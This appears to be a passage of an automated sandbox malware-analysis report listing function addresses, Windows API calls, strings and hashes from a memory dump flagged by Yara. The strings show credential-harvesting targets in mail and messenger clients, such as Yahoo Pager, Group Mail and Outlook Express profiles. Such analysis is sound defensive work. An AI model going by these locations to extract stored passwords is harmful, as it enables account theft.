                                                                                                      • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                                    • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetstrcat$Closestrcpystrlen
                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                    • API String ID: 1387626053-966475738
                                                                                                    • Opcode ID: ae4ddbe1f57ad3c02afdf42401c7af856889e818532549f3ab532874c9793afd
                                                                                                    • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                                                    • Opcode Fuzzy Hash: ae4ddbe1f57ad3c02afdf42401c7af856889e818532549f3ab532874c9793afd
                                                                                                    • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                    • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3673709545-0
                                                                                                    • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                    • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                                    • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                    • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                    • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3673709545-0
                                                                                                    • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                    • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                                    • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                    • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407D35
                                                                                                    • sprintf.MSVCRT ref: 00407D4A
                                                                                                      • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                                      • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                                      • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                                    • EnumChildWindows.USER32(?,Function_00007CAD,00000000), ref: 00407D81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                    • String ID: caption$dialog_%d
                                                                                                    • API String ID: 246480800-4161923789
                                                                                                    • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                    • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                                    • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                    • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                                    • memset.MSVCRT ref: 0040E2E9
                                                                                                    • memset.MSVCRT ref: 0040E2FB
                                                                                                      • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                    • memset.MSVCRT ref: 0040E3E2
                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                                    • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3799309942-0
                                                                                                    • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                    • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                                    • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                    • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409369, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                    • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                                    • sprintf.MSVCRT ref: 00409450
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWritesprintfstrcatstrlen
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 3813295786-4153097237
                                                                                                    • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                                    • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                                    • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                                    • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 00410A9D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                                    • strlen.MSVCRT ref: 00410B02
                                                                                                      • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                                      • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                                    • memcpy.MSVCRT ref: 00410B1C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 577244452-0
                                                                                                    • Opcode ID: 30407f2388abbfe8307fa01989266de76167557a98a019ee30b695fe80d221ec
                                                                                                    • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                                    • Opcode Fuzzy Hash: 30407f2388abbfe8307fa01989266de76167557a98a019ee30b695fe80d221ec
                                                                                                    • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AB54, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040AB74
                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32(00000000,0000000D,?,?), ref: 004079C8
                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,76020A60), ref: 0040797A
                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                      • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                                      • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                                      • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                                      • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 4021364944-3614832568
                                                                                                    • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                    • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                                    • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                    • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0040649C
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004064BC
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004064C9
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3197862061-0
                                                                                                    • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                    • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                                    • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                    • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403AB2
                                                                                                    • memset.MSVCRT ref: 00403ACB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                                    • strlen.MSVCRT ref: 00403B13
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1786725549-0
                                                                                                    • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                    • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                                    • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                    • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                                    • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                                    • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                                    • GetLastError.KERNEL32 ref: 0040AD11
                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014771361-0
                                                                                                    • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                                    • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                                    • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                                    • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcat$memsetsprintf
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 582077193-791839006
                                                                                                    • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                                    • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                                    • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                                    • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                                    • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                                    • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                                    • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040173B, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040174A
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 00401758
                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 00401764
                                                                                                    • BeginPaint.USER32(?,?), ref: 0040177E
                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 0040178D
                                                                                                    • EndPaint.USER32(?,?), ref: 0040179A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 19018683-0
                                                                                                    • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                                    • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                                    • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                                    • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411366, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411387
                                                                                                    • memset.MSVCRT ref: 004113A0
                                                                                                    • memset.MSVCRT ref: 004113B4
                                                                                                      • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                                    • strlen.MSVCRT ref: 004113D0
                                                                                                    • memcpy.MSVCRT ref: 004113F5
                                                                                                    • memcpy.MSVCRT ref: 0041140B
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                      • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                                    • memcpy.MSVCRT ref: 0041144B
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2142929671-0
                                                                                                    • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                    • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                                    • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                    • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,76020A60), ref: 0040797A
                                                                                                      • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                                    • strlen.MSVCRT ref: 00407998
                                                                                                    • LoadStringA.USER32(00000000,0000000D,?,?), ref: 004079C8
                                                                                                    • memcpy.MSVCRT ref: 00407A07
                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 1748916193-3030018805
                                                                                                    • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                                    • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                                    • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                                    • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                                    • memset.MSVCRT ref: 004032F2
                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                                                                    • strchr.MSVCRT ref: 00403341
                                                                                                      • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                                    • strlen.MSVCRT ref: 00403383
                                                                                                      • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                    • String ID: Personalities
                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                    • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                                    • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                                    • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                                    • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410F79, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00410F9B
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                    • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
